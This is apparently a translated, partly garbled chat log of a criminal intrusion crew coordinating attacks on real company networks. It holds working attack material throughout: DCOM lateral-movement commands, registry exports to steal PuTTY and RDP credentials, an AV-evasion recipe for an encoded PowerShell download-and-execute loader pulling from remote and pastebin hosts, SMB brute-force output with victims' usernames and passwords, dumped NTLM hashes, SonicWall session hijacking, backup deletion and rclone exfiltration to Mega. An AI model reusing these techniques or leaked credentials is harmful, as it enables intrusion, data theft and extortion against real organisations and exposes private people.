what is on the machines where you want to jump? hi
Salut, can someone check if the command is written correctly `powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.1.6.7")).Document.ActiveView.ExecuteShellCommand("C:\windows\system32\windowspowershell\v1.0\powershell.exe", $null, ` then I insert the code generated by the code `. then I get error: could not spawn (token): 87
```
run net helpmsg 87
[*] Tasked beacon to run: net helpmsg 87
[+] host called home, sent: 32 bytes
[+] received output:
The parameter is incorrect.
```
Question: Is it inserted as an argument? How should I close it? with double quotes or without? Or is there something else I'm missing? This method of jumping to a neighboring host (with the disclaimer that classic jumps don't work there) is described in this article: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ If you do not know how to jump to a neighboring host, it is possible to jump to a neighboring host using this method.
there, if you get up to SYSTEM, you can run responder\inveigh and fiddle with network hashes
here workgroup machines were as in the local one
run a web scanner and through socks to ports 80 443 8080 8443
http://github.com/NetSPI/PowerUpSQL
also mssql remote attack, look at
https://github.com/Ridter/cve-2020-0688
what else came to mind, ms17 all scanned
smart auto brute can try
ms17 no sense to repeat?
Salud guys. Here's a question.
Share what script someone uses if the session is from the network with a user who has privileges little more than the "printer". Stating immediately that the standard methods are tried: no tokens, Seatbelt does not work, nor does any other "execute-assembly" command (Failed to load the assembly w/hr 0x8007000b); no share where this user could move to either. Access to the system folders is closed. Injecting into a SYSTEM process also cannot be done. In general, I am interested in what you do in such cases. The question is of a general nature, such "hard cases" as this one, there will not be a second one
No need to reply here
Gentlemen #teamleaders, let those who understand badly the first time; I really hope that it will be understood and taken
@all gentlemen, friends and colleagues, I'm sick and tired of being a fucking babysitter for everyone; specifically here is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work; the next group that will ignore it will itself choose a responsible person who will be punished with a ruble or forever excluded from the work process; everyone has nerves - I have a lot, but I also have a certain limit
princeluna
ATXBugsambaasdf7f814vycfas
does anyone have msf at hand where Armitage can be legitimate?
GruzuPars
hi, please send, who has the video Fast Guide + textbook from there
if this is an NTLM LM hash then cmd5.org
cheeks in PM, for what
thanks, man)
@VasyaPypkin F22F154A1307A6D7C523E55BAB861365 Locmis2003
guys, anyone have any capacity? need a script
hi, I myself am sitting with almost no work, puzzle me?
almost no business yourself? you got something for me?
hello
@hitech here
the first two are +- junk, just convenient, look at the third imho
mssql != mysql
we have to try and find his computer, and he may have the creds somewhere either in the shares or in the DEV zones; haven't found them yet, but on the desktop and in the password manager everything will be fine + taking over the computer of the SQL developer / sysadmin is not a problem, right?
it's worth a look in the configured applications to see if there is a DB / hostname you want to connect to on the admin_computer. if not then ... ugly
linux creds != creds to the database, and mysql cmd under the current context not found
you can do it under the DA account, module in msf mysql_sql, if you already have the rights raised, so
PowerUpSQL is the most buzzing toolkit for working with Windows
http://github.com/FortyNorthSecurity/SqlClient https://github.com/uknowsec/SharpSQLTools https://github.com/NetSPI/PowerUpSQL - !!!!!! right in the Cobalt - no
fat32039482753QQ
I already went to the admin, he sleeps at night
don't want to complicate, I don't want to
removed you about the MSF, what about the chromat
ova - I tried, it was the same as what?
module to remove the session on the msf, don't throw, it's drizzling) ok, at night I'll go directly) there will be a log, it's not fat, there will be space I think, it is unlikely there is no space ... change 2 to 10
```
ERROR: Unable to write to the file. There may be a disk or file system error.
File C:\ProgramData\AppBkUp2.reg already exists. Overwrite (Yes/No)? {
```
Diroux changed
```
ERROR: Unable to write to the file. There may be a disk or file system error.
The operation completed successfully.
The operation completed successfully.
```
If not, I'll just go at night, I'll report the results; I have not reached the logger yet; if very necessary, the dll, eh, I can find it, I have not used it; in Cobalt there is a keylogger, I think I'll run it, I'll report and that's all I can do with them
I have a keylogger
a stealer can be a Linux conquest
Bro, everything is on Mac, KeePass, some... Chrome inspected and needed) from the user's context, yes, and the creds will come) where does he keep passwords
How to run the script and all?
I don't know how to get the session and the creds from PuTTY, what's the problem? is there a session with the procs or not? do you have a Cobalt dll or will it get annoying?
```
[+] Determining what AntiVirus is installed...
[+] host called home, sent: 267422 bytes
[+] received output:
PID|Name|Path
Windows Defender AV Signature Version: 1.259.1455.0
AV Name|Version|Install Date
[+] received output:
displayName : Trend Micro Apex One Antivirus
pathToSignedReportingExe : C:\Program Files (x86)\Trend Micro\Security Agent\TmListen.exe
Timestamp : Tue, 15 Sep 2020 15:31:55 GMT
displayName : Windows Defender
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
timestamp : Mon, 15 Jan 2018 22:15:39 GMT
```
Which one is it?
I'll write to you via invoke; the hash, thank you, I'll try to mess with the user's context but I'm not sure if that's it or not, I have it written down
```
@echo off
REG EXPORT "HKEY_CURRENT_USER\Software\SimonTatham" "C:\ProgramData\AppBkUp1.reg"
REG EXPORT "HKEY_CURRENT_USER\Software\Martin Prikryl" "C:\ProgramData\AppBkUp2.reg"
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" "C:\ProgramData\AppBkUp3.reg"
```
```
putty
HKCU\Software\SimonTatham\PuTTY\Sessions
recursive search for *.ppk up to 3rd level in %USERPROFILE%\Documents %USERPROFILE%\.ssh %USERPROFILE%\Downloads
HKCU\Software\SimonTatham\PuTTY\Sessions
```
Now the secret creds, in my opinion, in my opinion, go through the registry
PuTTY is, what AV?
dr_qenu
PuTTY at the admin is open and he authorizes the admin computer - there
putty. Searched everything - no creds. In MSF the session does not come - AV cuts it (wanted to work with PuTTY through MSF). Question - do we have any solutions to get the creds from PuTTY? A stealer or something else?
a couple of new tricks can be found
mikecook thanks, I will look at examples for portscan in Cobalt, an error in syntax probably, add `icmp 1024`
Hi all!
```
beacon> portscan 192.168.0.0/24 445
[*] Tasked beacon to scan ports 445 on 192.168.0.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```
Why can this happen? The scan finishes at once; the range is exactly the same as on the forum, at once)
the service stack of DB processes etc. For local mount if suddenly :)
well, fresh
cdll works under Defender from cmd (without Cobalt)
likely there is an Outlook client, preferably not trial?
there seems to be, but it's like putting it in the trash, and there is no simple option to delete?
cloud backups on Veeam, who tried to crush them? got the account. and how to delete? want to try overwriting but maybe there is an alternative?
threw the keys, all activated, cp)
oh well, now I'll try it)
lay on Pikabu, did so at least, the key went in without a fuckin' google; type in, maybe somebody knows where to get it? does anyone purely by chance have the key to Proxifier?
gotcha
There is no such thing on this network, subconsciously immediately started looking for the new bookmark)))
@ali please quote the message and not reply in the subject (the button to the left), there the notifications have to close
Obviously I have the ability to create bookmarks there
well, it turns out his computer is asleep just yet; if I do not kick it, will it be happy, and just not connect?
I, with eleventom, first made a SYSTEM session and it was already injected with another account
may try, but you will "kick" the user if he has a bookmark only on his workstation
new artifact kit, everything in SYSTEM, does not migrate the session from the admin
* NetExtender Clients put, yes
2fa, no; you have 2fa, yes?
Show bookmarks > there are no new bookmarks?
Alarm
```
Trying to connect ...
There is a problem connecting to this machine, please check it...
The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator.
```
Work PC, what's there?
I can't find where to add this tab. It feels like there's no such option in Sonic
leave RDP, I'm logged in there without any credentials, I don't remember exactly but it was intuitively clear, create new bookmark
once redirected to the portal, but there was no bookmark to connect to the PC
Same way, if you want to make a new bookmark go straight to this SMA.
Try to make a session under another cookie, it doesn't ask me how, it tries to set a connection to 127.0.0.1:8877
the connection is made from your IP to the Sonic gateway and then to the virtual desktop (or physical host); the SMA should just be put on the dedicated server and it will connect through localhost
sorry, confused with NetExtender Clients in SMAConnect; there in proxy I enter: target IP, port 443, creds? I did, and then I do not know what to do) they are fresh; here we had this, as I understand it, the sessions just died
Through it enter creds, 2fa sends
Through it try to enter
was it the Secure Mobile Access client?
SonicWALL - encoding the session ID in base64
```
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome)
- I add a cookie in the console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal`
- It takes me back to the page `https://target/cgi-bin/welcome`
so for all three sessions in the target it's one session
once redirected to the portal, but there were no bookmarks to connect to the PC. Anybody had problems with this? what did you do next?
@rozetka @t3chnolog thanks for your help) everything started, "the ore went"))
on port 80 raise https, or 8443, maybe even roll up Cobalt and try it
now you can just kill the jobs with socks and start one from another router; respawn sessions, make them shorter
I think you have a badly configured router
`tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby`
I thought it was fucked up) it's a server with msf
you have no external IP? are you behind a NAT or something? interface to your provider's LAN and
```
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Microsoft Hyper-V Network Adapter #2
Hardware MAC : 00:15:5d:79:a8:19
MTU : 1500
IPv4 Address : 172.30.100.175
IPv4 Netmask : 255.255.255.0
```
jobs -k number
Print the socks list, take them all out and start one from the session you want
mask /8 for the 10.0.0.0 subnet only, e.g.
172.8.240.5 what you have specified may not be recognized as a local address at all
```
10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8)
100.64.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses.
172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12)
192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16)
```
wikipedia
if the second, then you first put `172.0.0.0/8`
is this strange? or ufw disable this one
google local network masks then `172.0.0.0/8`
your subnet mask is still strange, you know?
add the session number
what port forward and rules in ufw
```
IPv4 Active Routing Table
=========================
Subnet        Netmask     Gateway
------        -------     -------
172.30.0.0    255.0.0.0   Session 3
172.30.100.0  240.0.0.0   Session 4
```
route print
show the socks; should it look in the specified router?
port fwd is another thing and also doesn't go; you don't do any port forwarding on the server?
like this, add 172.30.100.0/4 4, or try
route add 172.0.0.0/4 4
route add 172.0.0.0/8 session 4
172.30.100.0/24, and as a router, in what range should it "watch"?
What did I forget to miss? 1) there is a session on the server in the Cobalt, it is not spawned 2) on the server run socks to the local host, it can look into the network. What has been done: I set the router
```
IPv4 Active Routing Table
------        -------     -------
172.0.0.0     255.0.0.0   Session 4
```
2) Socks started: the port on the server is open and listening
```
msf6 auxiliary(server/socks4a) > set srv
set srvhost set srvport
msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112
srvhost => 185.212.129.112
msf6 auxiliary(server/socks4a) > set srvport 1000
srvport => 1000
msf6 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000
[*] exec: netstat -antp | grep 1000
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
msf6 auxiliary(server/socks4a) > netstat -npl
[*] exec: netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby
tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
```
UFW disabled. I set the server IP and port in proxychains, trying to ping hosts from the network - they are not pinged.
I don't know well, but maybe tips
Please write to lsnu, or maybe someone knows regexes (although I do not know whether this issue can be resolved through regexes)
has anyone worked with mail:pass databases or similar bases for brute force?
has someone already mastered dragging data from SharePoint / Office 365?
which time I've met that they store docs there
vssadmin not suitable? I did a snapshot, took everything, removed it, no traces, except logs)
stewart
Thank you.
https://github.com/zcgonvh/NTDSDumpEx
@t3chnolog got it, thanks! can you recommend some other software for the decrypt, please?
https://github.com/Dionach/NtdsAudit/issues/3
Gentlemen, has anyone encountered this? I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error: `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.`
oki :thumbsup:
alter, release soon
@rozetka hi, where did you add it? fuck, fill it up and I'll delete the conf. Nothing's been added. Maybe a filter by IP region?
`Error: Permission denied.` Whatever, valid account or not
via web?
I've tried 10 creds - the same
Thanks for the advice, but after 3 hours another error pops up:
it may also be that a person with these creds is already registered as an active user with a session and it does not let you knock him out
VPN availability only on weekdays / certain hours, and a ban on work on weekends? guys, who has faced this? port 443 is open, the IP pings, if I enter the wrong credentials the VPN says that the credentials are wrong. Debug log says `msg="SSLVPN tunnel connection failed"`. Yesterday everything was fine, reinstalling Forti did not help
Today it's uploading
Please, whoever is free, or who can do today's work for tomorrow, please tell me; on the "fresh" bots you need to raise the rights and jump; to fix the normal ones PM me immediately with where to pass them
"I'll give it to you, gentlemen," you write that you have nothing to work with, then at 22 nobody is taking the bots?) right now, load the fresh bots with a fever, write to PM right away with where to pass the work?
mm-hmm) well, you there, careful, krCH)
in general, AMSI does not give a fuck about obfuscation, it looks at the code execution after deobfuscation, i.e. it looks for code execution after deobfuscation (i.e. after dll startup, it seems to me))
if more or less adequate people manage the network, then most likely there is a simple notification and you will be scooped up now) funny us))
before that, all dlls and .exe were flagged)
even if there is no AMSI and AV does not flag inside PowerShell - the PowerShell process downloading something from the net causes suspicion; but when there is AMSI (and on Server 16 it is) it's a fucking miracle you did not fuck up)
well, you're fucking lucky) most likely Cylance is not fucking configured
Version: 10.0.14393 N/A Build 14393
2016 server, which OS version did you bypass on?
it's possible, but you got bypassed) the dll is clean, not knocked out
I'm talking about regular servers, where even AMSI does not trigger a lot; you claw
spoiler - for a download string any normal EDR will fuck you
at the top and bottom of the code `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code` you can throw in garbage code, saves you from some AVs,
Enter `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("here is your code that we saved powershell ....."))`. An example of what mine looks like: `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://domain.com:443/updates'))"""))`; notice the quotes above, `""IEX` and at the end `"""))`, that is how you should put the quotes. Click on the Run Script green icon as in the screenshot. At the bottom, copy the encoded code, in my case `cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`. Create a new .ps1 and insert `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`, an example of my code: `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`. Done, try)
- here, where "/ups" is, put anything; you cannot do it 2 times with the same name, made it with "/a", the second time you have to change the "/a", for example to "/ab", etc.
- Local Host (your domain)
- Local Port (it should be 443)
The rest as in the screenshot, check the box and click Launch. A code will pop up, for example: `powershell.exe .....`, copy it, save it somewhere
ah well, this DNS, yes
`(Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})`
I remember ???
everybody, guys, here I am again, problems with internet solved :metal:
sonargoldner.com
throw me an invite to the conf
:thumbsup:
everything works, sorry for the confusion
It turns out you can watch which files are "busy" remotely :v:
thank you =)
```
apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
# change the root password
passwd root
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
# Then edit this file
nano /opt/metasploit-framework/bin/msfdb
# Comment out the lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database"
# Save and exit
```
mprimetrivo)
does anyone still have the manual on setting up msf? =)
Likewise! :thumbsup:
hey guys, happy new week :metal:
I will not extend the shared Cobalt server anymore. whoever has something there - take it away.
will go out the other day :) zdarovsem helloDid anyone have a friend or the opportunity to pay the bill Paypal or CC white account? $200 account to pay. PMa next already pg Up pg Dnv tmux ctrl B + [screenshot . what fly toldaa you can somehow work without tmux but not in this case small agree in small texts can help)and expand the window to the maximumCtrl + Minusprobowal yjene pomogaet the bottom leftstrl I os Kalilinukste buttons are slightly different)not, the bottom left corner of the screen is the same as the bottom left of the screen and the arrow up ( tmux ) is an analog of tmux but there are no such problems use screenpage upctrl + banda hey everyone, my question in the msf through tmux command result did not fit in the screen, is it possible how to scroll up, or tmux does not have enough native memory to save such a volume of information?hammer-all sorted out)apparently this software takes the polzak from the AD and passes to them this commandScript without a list of users differs only in two things. - psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5daeto what kind of software? smart auto brute force? [+] received output: [+] Success! Username: parag.sharma. Password: fusion@1234 [+] received output: [+] Success! Username: tanuj.sharma. Password: fusion@1234 [+] received output: [+] Success! Username: mukesh.nagda. Password: fusion@1234 [+] received output: [+] Success! Username: rajendra.chundawat. Password: fusion@1234 [+] received output: [+] Success! Username: rajan. Password: fusion@1234 `````` By smb brut set the names of a list of domain administrators Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- admin administrator avinash.kumar Thank you for the rest is empty hash or decrypted allfpeuser 1130 thank yousek any of the elders, can you let the brute force? 
steven is not here ```Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: fpeuser:1001:aad3b435b51404eeaad3b435b51404ee:78c026df2a8b5b9c5790b2ec76b51399::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5163658e468b00a5a328bbcceb2d9867::: ``and write a rota for the 2nd sessiondid the session in it vas local ipacs no 1 session is not your virtual ? )session alive ?sessions -xroute add 10.81.0.0.0/8 1rooting you in another diap were runroute add 10.0.0.0/8 1 into the studio print ortionsHi will try)I will be gone for a couple of hours, hold on! Output aquatone in ``user@kali:~$ aquatone-discover -d ess.com __ ____ _____ ___ ______ _/ /_____ ____ ___ / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \ / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/ \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/ /_/ discover v0.5.0 - by @michenriksen Identifying nameservers for ess.com... Done Using nameservers: - 173.201.72.45 - 97.74.104.45 Checking for wildcard DNS... Done Running collector: PublicWWW... Done (0 hosts) Running collector: Riddler... Skipped -> Key 'riddler_username' has not been set. Running collector: Netcraft... Done (0 hosts) Running collector: Threat Crowd... Done (5 hosts) Running collector: DNSDB... Done (0 hosts) Running collector: Wayback Machine... Done (54 hosts) Running collector: Google Transparency Report... Done (10 hosts) Running collector: PassiveTotal... Skipped -> Key 'passivetotal_key' has not been set. Running collector: HackerTarget... Done (2 hosts) Running collector: PTRArchive... Error -> PTRArchive returned unexpected response code: 502 Running collector: Certificate Search... Done (11 hosts) Running collector: Censys... Skipped -> Key 'censys_secret' has not been set. Running collector: Shodan... 
Skipped -> Key 'shodan' has not been set Running collector: VirusTotal... Skipped -> Key 'virustotal' has not been set. Running collector: Dictionary... Done (8210 hosts) Resolving 8258 unique hosts... 104.17.134.180 artcontest.ess.com 52.96.69.56 autodiscover.ess.com 3.215.239.59 blog.ess.com 96.248.123.101 conference.ess.com 96.248.123.102 connect.ess.com 72.167.218.45 email.ess.com 3.215.239.59 ess.com 3.215.239.59 ftp.ess.com 35.174.78.146 go.ess.com 104.17.132.180 library.ess.com 52.112.65.78 lyncdiscover.ess.com 104.17.133.180 refer.ess.com 34.200.47.197 resources.ess.com 52.112.67.51 sip.ess.com 3.215.239.59 static.ess.com 96.248.123.101 telecom.ess.com 104.17.136.180 together.ess.com 96.248.123.99 vpn.ess.com 3.215.239.59 www.ess.com Found subnets: - 3.215.239.0-255 : 5 hosts - 96.248.123.0-255 : 4 hosts Wrote 19 hosts to: - file:///home/user/aquatone/ess.com/hosts.txt - file:///home/user/aquatone/ess.com/hosts.json ``Put cali linux and aquatone in it. To search for subdomains :: for webshelf srolling \ search for VPN domains etc. I'll roll out the tools and who needs it - PM by the way, yes, conveniently rocket portable from portable app and you'll be happyrocket this web app they all have the same style of push notificationsHowever. it could be rocket's foxyproxistil blew up in the browser is fiancé who hasn't had this fucked up? hi. You're welcome.oh spsdate someone coba 4.1kGirls, here's a tip for anyone who works with networks :: When you have a network with rights - if possible make yourself on other machines (preferably server tc they work 24x7) several sessions. If you reboot the centralpoint machine with a session, you can come back to the network without wasting teammate time and do not have to wait for them to bring up your session. =)hello! we're in cteamhai:vulcan:everyone how slow the time goes:confounded:@all brothers and sisters, does anyone have any experience locating nix? 
of particular nix servers (ubuntu, debian) have a couple of questions @brandon here, and if anyone else needs, just gently, gentlemen. ``` Cecilia:Marquez:ranthank@mail.ru:r5SDrcedwe:ii5HBUAR ``Hi! welcomeFriends, hi all ! Does anyone have an account in linkedin ?@all have a new fix for IIS as a native module for IIS, FUDprivet writePartners! Hi all, help is needed. On sonic, please let me know who can help. ThanksNo)ralfhacker?[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) bqhost@exploit.im 200$ Xeon E5-2620; 16GB RAM; 16TB HDDu 2012 servaks very often have problems with rclone,3-4 mbps with a possible 600mbit,it would be desirable to find a solution to fix it,as on 2019 servak all finehttp://www.cherryservers.com/pricing/dedicated-servers``` E3-1270v6 48GB RAM DDR-4 1TB SSD 7x4TB HDD $700 ``[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) with expa from tun took.skien loyal hosters from whom you can take normal servers under the date for many tb for the bits hostboss - do not offer!!! reseller... at most under the coba takeGreetings What is the correct way to unload info from the mega, directly or through the cake? 1vpns.comdoublevpn.com guys, nakidayte please where double vpn through bitok you can buy, only verified, that the norm worked all by itself substitutedtmostmost domain itself I wrote - without https[ ](https://stylebrooks.com/group/general?msg=XkRWjCHQEiWHgMTX7) check-sonik.exe 107.0.27.225 C:\.....\sessions.јonv lx file @cod.ru it means different today used sonik checker - everything was o``` beacon> shell check-sonik.exe https://107.0.27.225 C:\.....\sessions.json ``[ ](https://stylebrooks.com/group/general?msg=64Fsi6zzMB9PsoCwr) show the command as written@all those who are out of work - please let me know, there are free vpnvs all hello @Code sonic checker stopped working? 
``` During handling of the above exception, another exception occurred: Traceback (most recent call last): File "requests\adapters.py", line 439, in send File "urllib3\connectionpool.py", line 755, in urlopen File "urllib3\util\retry.py", line 574, in increment urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='https', port=443): Max retries exceeded with url: //107.0.27.225/cgi-bin/portal (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 11001] getaddrinfo failed')) ``` https through the browser all ok by the way, also a question, I unloaded through the browser to the mega, at one point came the message that the account in the lock, no activity on the cars, where I sat on the htp was not observed, no one to connect (although for the shadow connection on htp not responsible), what can be ? how lock the mega ? in the browser in private mode, I worked, ie, leave a trace - did not leave an error invald user_idvot exactly, I tried to go to the guide, did not work for me.i.e. to leave a legacy - did not leave a legacy error invald user_idvot exactly, make friends with pklon, I tried to go by the guide, did not work for me it is so we know) Well, as if not )https://rclone.org/docs/ hello everyone, guys, the question is, has anyone tried to make friends with anything other than the mega, namely, with some analog of the mega, such as pcloud ? If yes, can you write off in lieu, because i can't get it right hello all, tell me how to see the log of deleted files in the line?
@all if you need to remake sonics - call me in the appropriate confudr For those who work with nix very useful link in fact) did not even know that through the service controller and remot register can remotely execute commands @all https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html i suggest those who i have not downloaded it yet it will not show debug with normal outtup, and i wrote -vtry to change it to true, it may give some more useful information that will help solve the problemstrangely enough your outtup with debug appears when you have debug = false in configvot the whole config[remote] type = mega user = user pass = pass debug = false hard_delete = falseIt looks like a junkie when it executesmaybe there's a problem in the config maybe the slashes are duplicated because it's shielding them or maybe the above is the log it writes when it's normal? well, that's the funny thing, they are duplicated I duplicate them - they are in a normal form, but writes that the path does not find and does not download at allMaybe the trick is that the slashes are duplicated? guys, who caught this anomaly? 
C:\ProgramData>rclone.exe copy "\\\HOUNAS01\Data\Projects\temp\data.zip" remote:D ata -vv --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 1 2 2021/04/05 06:36:02 DEBUG : rclone: Version "v1.53.1" starting with parameters [ "rclone.exe" "copy" "\\\\HOUNAS01\\\Data\\Projects\\temp\\\data.zip" "remote:Data" "-vv" "--ignore-existing" "--auto-confirm" "--multi-thread-streams" "12" "--tra nsfers" "12"] 2021/04/05 06:36:02 DEBUG : Creating backend with remote "\\\\HOUNAS01\\\Data\\\Pr ojects\\temp\data.zip" 2021/04/05 06:36:02 DEBUG : Using config file from "C:\Users/action.a\.config \\rclone\\\rclone.conf" 2021/04/05 06:36:02 DEBUG : fs cache: adding new entry for parent of "\\\\HOUNAS 01\Data\\\Projects\\temp\\data.zip", "//?/UNC/HOUNAS01/Data/Projects/temp" 2021/04/05 06:36:02 DEBUG : Creating backend with remote "remote:Data" 2021/04/05 06:36:05 DEBUG : data.zip: Need to transfer - File not found at Desti nation writes that the file will not find, and after a minute begins to download it for himself, but the problem is that the download is about 300-400kb per second, but the server can hundreds of times moreAhave anyone batchnik adfind in which the dop removes enum_ad? And explain someone please how to work through targets c ssh, at least in brief car with info 3389 is closed psexec and winrm not pulled inside the mega I have not changed anything, no restrictions on download speeds in what sense? On remote normal speed? Maybe someone has experienced slow copy in rclone? speed in speedtest is great, but rclone maximum eats 2-3 MB, do not play with transfers and trades also can use -m0-5, where 0 - no compression, and 5 - the maximum compression -r recursion Passwords -p123 put the password 123 `"C:\Program Files\Winrar\Winrar.exe" a -tn180d "\PATH\TO\RAR.RAR" "\PATH\TO\ARCHIVE"` put all files in the archive under the name RAR not older than 180 days (all that older 180 days are not uploaded) bros welcome! Advise current method of crypto psh. 
I knew one, but it is now for some reason does not work. I took an pch, put it on pastebin made a raw link and paste it in the command iex((new-object net.webclient).downloadstring('https://pastebin.com/raw/RjWXyfCW')) ran it through ps1, it converted it from 7627 to 250 characters, added the resulting code to powershell -nop -w hidden -encodedcommand ..... And got a short string that pulled the cars through the kmd without defender detection and aveshek, also worked through wmic Found similar sites where there is raw but they do it with a script and the session does not come. Hi all)atomhashersarmAirspoonin googledefault url pure-storageHowdy all, has anyone come across in work with the addition to veeam backup & replication called pure-storage ? Veeam settings show that storage is local not cloudy, on my network hostname is pinged, portscan shows 22/80/443/open ports When trying to connect with my browser I get a "deadlock", even though it is called pure-storage login, but I do not see any window to enter the credentials. screenshot for clarity may someone remember the logo WatSon look i thought there +- same checks by sploit check for 10 sploit + according to the description it's charnAnna build dLLeasone> dazzleUP [-] Could not find reflective loader in /home/user/apps/Cobalt_scripts/dazzleUP-master/dazzleUP_Reflective_DLL.dllhttps://github.com/hlldz/dazzleUP Not checked yet. Fury[ ](https://stylebrooks.com/group/discussion?msg=SkMtKMomvuMa5Sgeu) it often happens with Fortik, the solution is to get some of the simplest rdp's in us and eu in and in US networks sometimes with EU vpsok goes, and with the south no even though just bought - the logic is unclear. 
it is possible that the hoster takes in the same diepeim in webadminka in the admin panel you can configure i did not think that the network equipment can have a cloud securitinash dedikt like fortinet the fuck banned and everywhere we meet this VPN he fucking sends us blaclists are not separately on each gland, and are taken from somewhere from the fortinet clad? hi, tell me please fortik vpn has a shared blacklist ip? -spf key helphz didn't encounter and the archiver finishes the job how to solve the problem with duplicate files in 7z? ``` 7za.exe a -t7z -mx5 -ssw -pWLKfoiLn%@TYDB C:\Windows\Temp\arc.7z X:\ Y:\ Z:\ Creating archive C:\Windows\Temp\arc.7z Error: Duplicate filename: Airline Logos Airline Logos ``[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=tMh2P5WkhM76fBJPY) Did you try to put spaces in quotes? Maybe it'll help... like: ``` shell MEGAclient.exe put -q --ignore-quota-warn "\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z" ``Yeah, I've seen it too, but I haven't tried it yet. ``I figured out a solution, the right folder, and it's done... if anyone needs it.... `Or add an argument if you have one or just drop the client there>Unable to open local path I guess it only takes files from 